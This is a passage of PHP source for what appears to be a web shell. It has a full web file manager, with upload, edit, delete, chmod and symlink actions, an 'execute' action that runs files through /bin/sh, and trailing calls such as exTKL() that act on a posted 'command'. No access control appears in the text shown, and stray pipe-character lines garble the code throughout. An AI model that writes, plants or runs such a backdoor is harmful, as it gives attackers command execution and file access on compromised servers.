$size = strlen($content) + 5;
|
||
|
if ($size < 30) $size = 30;
|
||
|
return $size;
|
||
|
}
|
||
|
function request_dump () {
|
||
|
foreach ($_REQUEST as $key => $value) {
|
||
|
echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
|
||
|
}
|
||
|
}
|
||
|
function html ($string) {
|
||
|
global $charset;
|
||
|
return htmlentities($string, ENT_COMPAT, $charset);
|
||
|
}
|
||
|
function word ($word) {
|
||
|
global $words, $word_charset;
|
||
|
return htmlentities($words[$word], ENT_COMPAT, $word_charset);
|
||
|
}
|
||
|
function phrase ($phrase, $arguments) {
|
||
|
global $words;
|
||
|
static $search;
|
||
|
if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
|
||
|
for ($i = 0; $i < sizeof($arguments); $i++) {
|
||
|
$arguments[$i] = nl2br(html($arguments[$i]));
|
||
|
}
|
||
|
$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
|
||
|
return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
|
||
|
}
|
||
|
function getwords ($lang) {
|
||
|
global $word_charset, $date_format;
|
||
|
switch ($lang) {
|
||
|
case 'en':
|
||
|
default:
|
||
|
$date_format = 'n/j/y H:i:s';
|
||
|
$word_charset = 'ISO-8859-1';
|
||
|
return array(
|
||
|
'directory' => 'Directory',
|
||
|
'file' => 'File',
|
||
|
'filename' => 'Filename',
|
||
|
'size' => 'Size',
|
||
|
'permission' => 'Permission',
|
||
|
'owner' => 'Owner',
|
||
|
'group' => 'Group',
|
||
|
'other' => 'Others',
|
||
|
'functions' => 'Functions',
|
||
|
'read' => 'read',
|
||
|
'write' => 'write',
|
||
|
'execute' => 'execute',
|
||
|
'create_symlink' => 'create symlink',
|
||
|
'delete' => 'delete',
|
||
|
'rename' => 'rename',
|
||
|
'move' => 'move',
|
||
|
'copy' => 'copy',
|
||
|
'edit' => 'edit',
|
||
|
'download' => 'download',
|
||
|
'upload' => 'upload',
|
||
|
'create' => 'create',
|
||
|
'change' => 'change',
|
||
|
'save' => 'save',
|
||
|
'set' => 'set',
|
||
|
'reset' => 'reset',
|
||
|
'relative' => 'Relative path to target',
|
||
|
'yes' => 'Yes',
|
||
|
'no' => 'No',
|
||
|
'back' => 'back',
|
||
|
'destination' => 'Destination',
|
||
|
'symlink' => 'Symlink',
|
||
|
'no_output' => 'no output',
|
||
|
'user' => 'User',
|
||
|
'password' => 'Password',
|
||
|
'add' => 'add',
|
||
|
'add_basic_auth' => 'add basic-authentification',
|
||
|
'uploaded' => '"[%1]" has been uploaded.',
|
||
|
'not_uploaded' => '"[%1]" could not be uploaded.',
|
||
|
'already_exists' => '"[%1]" already exists.',
|
||
|
'created' => '"[%1]" has been created.',
|
||
|
'not_created' => '"[%1]" could not be created.',
|
||
|
'really_delete' => 'Delete these files?',
|
||
|
'deleted' => "These files have been deleted:\n[%1]",
|
||
|
'not_deleted' => "These files could not be deleted:\n[%1]",
|
||
|
'rename_file' => 'Rename file:',
|
||
|
'renamed' => '"[%1]" has been renamed to "[%2]".',
|
||
|
'not_renamed' => '"[%1] could not be renamed to "[%2]".',
|
||
|
'move_files' => 'Move these files:',
|
||
|
'moved' => "These files have been moved to \"[%2]\":\n[%1]",
|
||
|
'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]",
|
||
|
'copy_files' => 'Copy these files:',
|
||
|
'copied' => "These files have been copied to \"[%2]\":\n[%1]",
|
||
|
'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]",
|
||
|
'not_edited' => '"[%1]" can not be edited.',
|
||
|
'executed' => "\"[%1]\" has been executed successfully:\n{%2}",
|
||
|
'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}",
|
||
|
'saved' => '"[%1]" has been saved.',
|
||
|
'not_saved' => '"[%1]" could not be saved.',
|
||
|
'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.',
|
||
|
'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.',
|
||
|
'permission_for' => 'Permission of "[%1]":',
|
||
|
'permission_set' => 'Permission of "[%1]" was set to [%2].',
|
||
|
'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
|
||
|
'not_readable' => '"[%1]" can not be read.'
|
||
|
);
|
||
|
}
|
||
|
}
|
||
|
function getimage ($image) {
|
||
|
|
||
|
}
|
||
|
function html_header () {
|
||
|
|
||
|
|
||
|
}
|
||
|
function html_footer () {
|
||
|
echo <<<END
|
||
|
</body>
|
||
|
</html>
|
||
|
END;
|
||
|
}
|
||
|
function notice ($phrase) {
|
||
|
global $cols;
|
||
|
$args = func_get_args();
|
||
|
array_shift($args);
|
||
|
return '<tr id="notice"><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p>
|
||
|
<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
|
||
|
</tr>
|
||
|
';
|
||
|
}
|
||
|
function error ($phrase) {
|
||
|
global $cols;
|
||
|
$args = func_get_args();
|
||
|
array_shift($args);
|
||
|
return '<tr id="error">
|
||
|
<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
|
||
|
</tr>
|
||
|
';
|
||
|
}
|
||
|
|
||
|
|
||
|
////
|
||
|
$homedir = './';
|
||
|
if (get_magic_quotes_gpc()) {
|
||
|
array_walk($_GET, 'strip');
|
||
|
array_walk($_POST, 'strip');
|
||
|
array_walk($_REQUEST, 'strip');
|
||
|
}
|
||
|
if (array_key_exists('image', $_GET)) {
|
||
|
header('Content-Type: image/gif');
|
||
|
die(getimage($_GET['image']));
|
||
|
}
|
||
|
$delim = DIRECTORY_SEPARATOR;
|
||
|
if (function_exists('php_uname')) {
|
||
|
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
|
||
|
} else {
|
||
|
$win = ($delim == '\\') ? true : false;
|
||
|
}
|
||
|
if (!empty($_SERVER['PATH_TRANSLATED'])) {
|
||
|
$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
|
||
|
} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
|
||
|
$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
|
||
|
} elseif (function_exists('getcwd')) {
|
||
|
$scriptdir = getcwd();
|
||
|
} else {
|
||
|
$scriptdir = '.';
|
||
|
}
|
||
|
$homedir = relative2absolute($homedir, $scriptdir);
|
||
|
|
||
|
$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
|
||
|
|
||
|
if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
|
||
|
$dir = relative2absolute($dir, $_POST['olddir']);
|
||
|
}
|
||
|
|
||
|
$directory = simplify_path(addslash($dir));
|
||
|
|
||
|
$files = array();
|
||
|
$action = '';
|
||
|
if (!empty($_POST['submit_all'])) {
|
||
|
$action = $_POST['action_all'];
|
||
|
for ($i = 0; $i < $_POST['num']; $i++) {
|
||
|
if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
|
||
|
$files[] = $_POST["file$i"];
|
||
|
}
|
||
|
}
|
||
|
} elseif (!empty($_REQUEST['action'])) {
|
||
|
$action = $_REQUEST['action'];
|
||
|
$files[] = relative2absolute($_REQUEST['file'], $directory);
|
||
|
} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
|
||
|
$files[] = $_FILES['upload'];
|
||
|
$action = 'upload';
|
||
|
} elseif (array_key_exists('num', $_POST)) {
|
||
|
for ($i = 0; $i < $_POST['num']; $i++) {
|
||
|
if (array_key_exists("submit$i", $_POST)) break;
|
||
|
}
|
||
|
if ($i < $_POST['num']) {
|
||
|
$action = $_POST["action$i"];
|
||
|
$files[] = $_POST["file$i"];
|
||
|
}
|
||
|
}
|
||
|
if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
|
||
|
$files[] = relative2absolute($_POST['create_name'], $directory);
|
||
|
switch ($_POST['create_type']) {
|
||
|
case 'directory':
|
||
|
$action = 'create_directory';
|
||
|
break;
|
||
|
case 'file':
|
||
|
$action = 'create_file';
|
||
|
}
|
||
|
}
|
||
|
if (sizeof($files) == 0) $action = ''; else $file = reset($files);
|
||
|
|
||
|
if ($lang == 'auto') {
|
||
|
if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
|
||
|
$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
|
||
|
} else {
|
||
|
$lang = 'en';
|
||
|
}
|
||
|
}
|
||
|
$words = getwords($lang);
|
||
|
$cols = ($win) ? 4 : 7;
|
||
|
if (!isset($dirpermission)) {
|
||
|
$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
|
||
|
}
|
||
|
if (!isset($filepermission)) {
|
||
|
$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
|
||
|
}
|
||
|
if (!empty($_SERVER['SCRIPT_NAME'])) {
|
||
|
$self = html(basename($_SERVER['SCRIPT_NAME']));
|
||
|
} elseif (!empty($_SERVER['PHP_SELF'])) {
|
||
|
$self = html(basename($_SERVER['PHP_SELF']));
|
||
|
} else {
|
||
|
$self = '';
|
||
|
}
|
||
|
if (!empty($_SERVER['SERVER_SOFTWARE'])) {
|
||
|
if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
|
||
|
$apache = true;
|
||
|
} else {
|
||
|
$apache = false;
|
||
|
}
|
||
|
} else {
|
||
|
$apache = true;
|
||
|
}
|
||
|
switch ($action) {
|
||
|
case 'view':
|
||
|
if (is_script($file)) {
|
||
|
ob_start();
|
||
|
highlight_file($file);
|
||
|
$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
|
||
|
$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
|
||
|
ob_end_clean();
|
||
|
html_header();
|
||
|
echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
|
||
|
<hr />
|
||
|
<table>
|
||
|
<tr>
|
||
|
<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
|
||
|
<pre style="margin-top: 0"><code>';
|
||
|
for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
|
||
|
echo '</code></pre>
|
||
|
</td>
|
||
|
<td style="text-align: left; vertical-align: top; padding-left: 3pt">
|
||
|
<pre style="margin-top: 0">' . $src . '</pre>
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
';
|
||
|
html_footer();
|
||
|
} else {
|
||
|
echo '<textarea name="code" cols="150" rows="50" wrap="VIRTUAL" >';
|
||
|
readfile($file);
|
||
|
}
|
||
|
break;
|
||
|
case 'download':
|
||
|
header('Pragma: public');
|
||
|
header('Expires: 0');
|
||
|
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
|
||
|
header('Content-Type: ' . getmimetype($file));
|
||
|
header('Content-Disposition: attachment; filename=' . basename($file) . ';');
|
||
|
header('Content-Length: ' . filesize($file));
|
||
|
readfile($file);
|
||
|
break;
|
||
|
case 'upload':
|
||
|
$dest = relative2absolute($file['name'], $directory);
|
||
|
if (@file_exists($dest)) {
|
||
|
listing_page(error('already_exists', $dest));
|
||
|
} elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
|
||
|
listing_page(notice('uploaded', $file['name']));
|
||
|
} else {
|
||
|
listing_page(error('not_uploaded', $file['name']));
|
||
|
}
|
||
|
break;
|
||
|
case 'create_directory':
|
||
|
if (@file_exists($file)) {
|
||
|
listing_page(error('already_exists', $file));
|
||
|
} else {
|
||
|
$old = @umask(0777 & ~$dirpermission);
|
||
|
if (@mkdir($file, $dirpermission)) {
|
||
|
listing_page(notice('created', $file));
|
||
|
} else {
|
||
|
listing_page(error('not_created', $file));
|
||
|
}
|
||
|
@umask($old);
|
||
|
}
|
||
|
break;
|
||
|
case 'create_file':
|
||
|
if (@file_exists($file)) {
|
||
|
listing_page(error('already_exists', $file));
|
||
|
} else {
|
||
|
$old = @umask(0777 & ~$filepermission);
|
||
|
if (@touch($file)) {
|
||
|
edit($file);
|
||
|
} else {
|
||
|
listing_page(error('not_created', $file));
|
||
|
}
|
||
|
@umask($old);
|
||
|
}
|
||
|
break;
|
||
|
case 'execute':
|
||
|
chdir(dirname($file));
|
||
|
$output = array();
|
||
|
$retval = 0;
|
||
|
exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
|
||
|
$error = ($retval == 0) ? false : true;
|
||
|
if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
|
||
|
if ($error) {
|
||
|
listing_page(error('not_executed', $file, implode("\n", $output)));
|
||
|
} else {
|
||
|
listing_page(notice('executed', $file, implode("\n", $output)));
|
||
|
}
|
||
|
break;
|
||
|
case 'delete':
|
||
|
if (!empty($_POST['no'])) {
|
||
|
listing_page();
|
||
|
} elseif (!empty($_POST['yes'])) {
|
||
|
$failure = array();
|
||
|
$success = array();
|
||
|
foreach ($files as $file) {
|
||
|
if (del($file)) {
|
||
|
$success[] = $file;
|
||
|
} else {
|
||
|
$failure[] = $file;
|
||
|
}
|
||
|
}
|
||
|
$message = '';
|
||
|
if (sizeof($failure) > 0) {
|
||
|
$message = error('not_deleted', implode("\n", $failure));
|
||
|
}
|
||
|
if (sizeof($success) > 0) {
|
||
|
$message .= notice('deleted', implode("\n", $success));
|
||
|
}
|
||
|
listing_page($message);
|
||
|
} else {
|
||
|
html_header();
|
||
|
echo '<form action="' . $self . '?tool=Files" method="post">
|
||
|
<table class="dialog">
|
||
|
<tr>
|
||
|
<td class="dialog">
|
||
|
';
|
||
|
request_dump();
|
||
|
echo "\t<b>" . word('really_delete') . '</b>
|
||
|
<p>
|
||
|
';
|
||
|
foreach ($files as $file) {
|
||
|
echo "\t" . html($file) . "<br />\n";
|
||
|
}
|
||
|
echo ' </p>
|
||
|
<hr />
|
||
|
<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
|
||
|
<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
break;
|
||
|
case 'rename':
|
||
|
if (!empty($_POST['destination'])) {
|
||
|
$dest = relative2absolute($_POST['destination'], $directory);
|
||
|
if (!@file_exists($dest) && @rename($file, $dest)) {
|
||
|
listing_page(notice('renamed', $file, $dest));
|
||
|
} else {
|
||
|
listing_page(error('not_renamed', $file, $dest));
|
||
|
}
|
||
|
} else {
|
||
|
$name = basename($file);
|
||
|
html_header();
|
||
|
echo '<form action="' . $self . '?tool=Files" method="post">
|
||
|
<table class="dialog">
|
||
|
<tr>
|
||
|
<td class="dialog">
|
||
|
<input type="hidden" name="action" value="rename" />
|
||
|
<input type="hidden" name="file" value="' . html($file) . '" />
|
||
|
<input type="hidden" name="dir" value="' . html($directory) . '" />
|
||
|
<b>' . word('rename_file') . '</b>
|
||
|
<p>' . html($file) . '</p>
|
||
|
<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
|
||
|
<input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
|
||
|
<hr />
|
||
|
<input type="submit" value="' . word('rename') . '" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
break;
|
||
|
case 'move':
|
||
|
if (!empty($_POST['destination'])) {
|
||
|
$dest = relative2absolute($_POST['destination'], $directory);
|
||
|
$failure = array();
|
||
|
$success = array();
|
||
|
foreach ($files as $file) {
|
||
|
$filename = substr($file, strlen($directory));
|
||
|
$d = $dest . $filename;
|
||
|
if (!@file_exists($d) && @rename($file, $d)) {
|
||
|
$success[] = $file;
|
||
|
} else {
|
||
|
$failure[] = $file;
|
||
|
}
|
||
|
}
|
||
|
$message = '';
|
||
|
if (sizeof($failure) > 0) {
|
||
|
$message = error('not_moved', implode("\n", $failure), $dest);
|
||
|
}
|
||
|
if (sizeof($success) > 0) {
|
||
|
$message .= notice('moved', implode("\n", $success), $dest);
|
||
|
}
|
||
|
listing_page($message);
|
||
|
} else {
|
||
|
html_header();
|
||
|
echo '<form action="' . $self . '?tool=Files" method="post">
|
||
|
<table class="dialog">
|
||
|
<tr>
|
||
|
<td class="dialog">
|
||
|
';
|
||
|
request_dump();
|
||
|
echo "\t<b>" . word('move_files') . '</b>
|
||
|
<p>
|
||
|
';
|
||
|
foreach ($files as $file) {
|
||
|
echo "\t" . html($file) . "<br />\n";
|
||
|
}
|
||
|
echo ' </p>
|
||
|
<hr />
|
||
|
' . word('destination') . ':
|
||
|
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
|
||
|
<input type="submit" value="' . word('move') . '" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
break;
|
||
|
case 'copy':
|
||
|
if (!empty($_POST['destination'])) {
|
||
|
$dest = relative2absolute($_POST['destination'], $directory);
|
||
|
if (@is_dir($dest)) {
|
||
|
$failure = array();
|
||
|
$success = array();
|
||
|
foreach ($files as $file) {
|
||
|
$filename = substr($file, strlen($directory));
|
||
|
$d = addslash($dest) . $filename;
|
||
|
if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
|
||
|
$success[] = $file;
|
||
|
} else {
|
||
|
$failure[] = $file;
|
||
|
}
|
||
|
}
|
||
|
$message = '';
|
||
|
if (sizeof($failure) > 0) {
|
||
|
$message = error('not_copied', implode("\n", $failure), $dest);
|
||
|
}
|
||
|
if (sizeof($success) > 0) {
|
||
|
$message .= notice('copied', implode("\n", $success), $dest);
|
||
|
}
|
||
|
listing_page($message);
|
||
|
} else {
|
||
|
if (!@file_exists($dest) && @copy($file, $dest)) {
|
||
|
listing_page(notice('copied', $file, $dest));
|
||
|
} else {
|
||
|
listing_page(error('not_copied', $file, $dest));
|
||
|
}
|
||
|
}
|
||
|
} else {
|
||
|
html_header();
|
||
|
echo '<form action="' . $self . '?tool=Files" method="post">
|
||
|
<table class="dialog">
|
||
|
<tr>
|
||
|
<td class="dialog">
|
||
|
';
|
||
|
request_dump();
|
||
|
echo "\n<b>" . word('copy_files') . '</b>
|
||
|
<p>
|
||
|
';
|
||
|
foreach ($files as $file) {
|
||
|
echo "\t" . html($file) . "<br />\n";
|
||
|
}
|
||
|
echo ' </p>
|
||
|
<hr />
|
||
|
' . word('destination') . ':
|
||
|
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
|
||
|
<input type="submit" value="' . word('copy') . '" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
break;
|
||
|
case 'create_symlink':
|
||
|
if (!empty($_POST['destination'])) {
|
||
|
$dest = relative2absolute($_POST['destination'], $directory);
|
||
|
if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
|
||
|
if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
|
||
|
if (!@file_exists($dest) && @symlink($file, $dest)) {
|
||
|
listing_page(notice('symlinked', $file, $dest));
|
||
|
} else {
|
||
|
listing_page(error('not_symlinked', $file, $dest));
|
||
|
}
|
||
|
} else {
|
||
|
html_header();
|
||
|
echo '<form action="' . $self . '?tool=Files" method="post">
|
||
|
<table class="dialog" id="symlink">
|
||
|
<tr>
|
||
|
<td style="vertical-align: top">' . word('destination') . ': </td>
|
||
|
<td>
|
||
|
<b>' . html($file) . '</b><br />
|
||
|
<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
|
||
|
<label for="checkbox_relative">' . word('relative') . '</label>
|
||
|
<input type="hidden" name="action" value="create_symlink" />
|
||
|
<input type="hidden" name="file" value="' . html($file) . '" />
|
||
|
<input type="hidden" name="dir" value="' . html($directory) . '" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td>' . word('symlink') . ': </td>
|
||
|
<td>
|
||
|
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
|
||
|
<input type="submit" value="' . word('create_symlink') . '" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
break;
|
||
|
case 'edit':
|
||
|
if (!empty($_POST['save'])) {
|
||
|
$content = str_replace("\r\n", "\n", $_POST['content']);
|
||
|
if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
|
||
|
listing_page(notice('saved', $file));
|
||
|
} else {
|
||
|
listing_page(error('not_saved', $file));
|
||
|
}
|
||
|
} else {
|
||
|
if (@is_readable($file) && @is_writable($file)) {
|
||
|
edit($file);
|
||
|
} else {
|
||
|
listing_page(error('not_edited', $file));
|
||
|
}
|
||
|
}
|
||
|
break;
|
||
|
case 'permission':
|
||
|
if (!empty($_POST['set'])) {
|
||
|
$mode = 0;
|
||
|
if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
|
||
|
if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
|
||
|
if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
|
||
|
|
||
|
if (@chmod($file, $mode)) {
|
||
|
listing_page(notice('permission_set', $file, decoct($mode)));
|
||
|
} else {
|
||
|
listing_page(error('permission_not_set', $file, decoct($mode)));
|
||
|
}
|
||
|
} else {
|
||
|
html_header();
|
||
|
$mode = fileperms($file);
|
||
|
echo '<form action="' . $self . '?tool=Files" method="post">
|
||
|
<table class="dialog">
|
||
|
<tr>
|
||
|
<td class="dialog">
|
||
|
<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
|
||
|
<hr />
|
||
|
<table id="permission">
|
||
|
<tr>
|
||
|
<td></td>
|
||
|
<td style="border-right: 1px solid black">' . word('owner') . '</td>
|
||
|
<td style="border-right: 1px solid black">' . word('group') . '</td>
|
||
|
<td>' . word('other') . '</td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td style="text-align: right">' . word('read') . ':</td>
|
||
|
<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
|
||
|
<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
|
||
|
<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td style="text-align: right">' . word('write') . ':</td>
|
||
|
<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
|
||
|
<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
|
||
|
<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td style="text-align: right">' . word('execute') . ':</td>
|
||
|
<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
|
||
|
<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
|
||
|
<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<hr />
|
||
|
<input type="submit" name="set" value="' . word('set') . '" />
|
||
|
<input type="hidden" name="action" value="permission" />
|
||
|
<input type="hidden" name="file" value="' . html($file) . '" />
|
||
|
<input type="hidden" name="dir" value="' . html($directory) . '" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
break;
|
||
|
default:
|
||
|
listing_page();
|
||
|
}
|
||
|
|
||
|
exit;
|
||
|
}
|
||
|
echo '<table width="100%" border="0"><tr><td rowspan="1">';
|
||
|
dirTKL ($dir);
|
||
|
echo '</td><td align="right" valign="bottom" ><textarea rows="15" cols="100" >';
|
||
|
if (!$function_tkl == ''){
|
||
|
readFileTKL ($function_tkl,$pwd);
|
||
|
}
|
||
|
if (!$_POST['command'] == ''){
|
||
|
exTKL ();
|
||
|
}
|
||
|
if ($_POST['function_tkl'] == 'mysql1'){
|
||
|
echo $gaza_file;
|
||
|
}
|
||
|
fotTKL($gaza_text,$gaza_text1,$dir);
|
||
|
?>
|